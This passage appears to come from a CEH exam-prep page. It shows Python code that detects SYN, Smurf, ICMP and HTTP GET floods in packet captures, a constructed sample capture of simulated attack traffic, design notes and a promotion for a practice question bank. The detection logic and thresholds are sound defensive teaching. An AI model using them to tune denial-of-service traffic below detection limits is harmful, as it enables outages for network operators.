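def detect(pkts, syn_min=100, icmp_min=100, get_min=200, window=10.0):
    syn_srcs = defaultdict(list)   # dst -> every source that sent a bare SYN
    ack_srcs = defaultdict(set)    # dst -> sources that finished the handshake
    echo_srcs = defaultdict(list)  # dst -> sources of ICMP echo requests
    gets = defaultdict(list)       # (dst, uri) -> (ts, src) of GET requests
    for p in pkts:
        if p.proto == "tcp" and p.flags == "S":
            syn_srcs[p.dst].append(p.src)
        elif p.proto == "tcp" and p.flags == "A":
            ack_srcs[p.dst].add(p.src)
        elif p.proto == "tcp" and p.dport == 80 and p.payload.startswith("GET "):
            gets[(p.dst, p.payload.split()[1])].append((p.ts, p.src))
        elif p.proto == "icmp" and p.icmp_type == 8:
            echo_srcs[p.dst].append(p.src)
    alerts = []
    # SYN flood: many half-open SYNs that almost never complete, nearly all from distinct (spoofed) sources.
    for dst, srcs in syn_srcs.items():
        distinct = set(srcs)
        done = len(distinct & ack_srcs[dst])
        if len(srcs) >= syn_min and done < 0.1 * len(distinct) and len(distinct) > 0.9 * len(srcs):
            alerts.append(Alert("syn_flood", dst,
                                f"{len(srcs)} SYNs from {len(distinct)} sources, {done} handshakes completed"))
    # Smurf: echo requests to a broadcast address, where the forged source is the real victim.
    # ICMP flood: many echo requests to one unicast host from many sources.
    for dst, srcs in echo_srcs.items():
        if looks_broadcast(dst):
            for victim, n in Counter(srcs).items():
                if n >= 10:
                    alerts.append(Alert("smurf", victim, f"{n} echo requests to broadcast {dst} forged as {victim}"))
        elif len(srcs) >= icmp_min and len(set(srcs)) >= 20:
            alerts.append(Alert("icmp_flood", dst, f"{len(srcs)} echo requests from {len(set(srcs))} sources"))
    # HTTP GET flood: one URL requested far above baseline from many sources inside a short window.
    for (dst, uri), reqs in gets.items():
        span = max(t for t, _ in reqs) - min(t for t, _ in reqs)
        srcs = {s for _, s in reqs}
        if len(reqs) >= get_min and len(srcs) >= 20 and span <= window:
            alerts.append(Alert("http_get_flood", f"{dst} GET {uri}",
                                f"{len(reqs)} requests from {len(srcs)} sources in {span:.1f}s"))
    return alerts


def sample_capture():
    """Constructed traffic: benign handshakes, then one instance of each attack pattern."""
    pk, t = [], 0.0
    for i in range(5):  # benign: full handshake plus one GET /about from each client
        c = f"192.168.1.{10 + i}"
        pk += [Pkt(t, "tcp", c, "10.0.0.8", 80, "S"), Pkt(t + 0.01, "tcp", "10.0.0.8", c, 0, "SA"),
               Pkt(t + 0.02, "tcp", c, "10.0.0.8", 80, "A"),
               Pkt(t + 0.03, "tcp", c, "10.0.0.8", 80, "PA", payload="GET /about HTTP/1.1")]
        t += 0.1
    for i in range(150):  # SYN flood on 10.0.0.5:443 from 150 distinct spoofed sources, 2 complete
        src = f"{(i * 37) % 223 + 1}.{(i * 91) % 256}.{(i * 53) % 256}.{(i * 17) % 254 + 1}"
        pk.append(Pkt(t, "tcp", src, "10.0.0.5", 443, "S"))
        if i < 2:
            pk.append(Pkt(t + 0.001, "tcp", src, "10.0.0.5", 443, "A"))
        t += 0.002
    for _ in range(40):  # Smurf: echo requests to the subnet broadcast, source forged as 10.0.0.9
        pk.append(Pkt(t, "icmp", "10.0.0.9", "10.0.0.255", icmp_type=8))
        t += 0.001
    for i in range(120):  # ICMP flood: echo requests to 10.0.0.6 from 120 different sources
        pk.append(Pkt(t, "icmp", f"198.51.100.{i % 250 + 1}", "10.0.0.6", icmp_type=8))
        t += 0.001
    for i in range(250):  # HTTP GET flood: one URL from 50 sources in roughly 2.5 s
        pk.append(Pkt(t, "tcp", f"203.0.113.{i % 50 + 1}", "10.0.0.8", 80, "PA",
                      payload="GET /index.php?page=home HTTP/1.1"))
        t += 0.01
    return pk


if __name__ == "__main__":
    for a in detect(sample_capture()):
        print(f"[{a.kind}] {a.target}: {a.detail}")
```

Two design points matter in practice. The Smurf alert names the forged source, not the sender, because the spoofed address is the host that will be buried in echo replies; and the SYN-flood rule keys on the ratio of completed handshakes to distinct sources rather than on raw SYN volume, which is what separates a flood of random spoofed addresses from a legitimate traffic spike.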
The Malware, Social Engineering and Network Attacks domain covers the key concepts tested in this area of the CEH exam blueprint published by EC-Council. Courseiva provides free domain-focused practice, mock exams, missed-question review, and readiness tracking across all CEH domains — no account required.
The Courseiva CEH question bank contains 216 questions in the Malware, Social Engineering and Network Attacks domain. Click any question to see the full explanation and answer breakdown.
Start with a 10-question focused session to identify your baseline accuracy in this domain. Read every explanation — even for questions you answer correctly — to understand the reasoning. Once you score consistently above 80%, move to a 20–30 question session to confirm depth before moving to the next domain.
Yes — the session launcher on this page draws questions exclusively from the Malware, Social Engineering and Network Attacks domain. Choose 10, 20, 30, or 50 questions for a focused session, or click individual questions to review them one by one.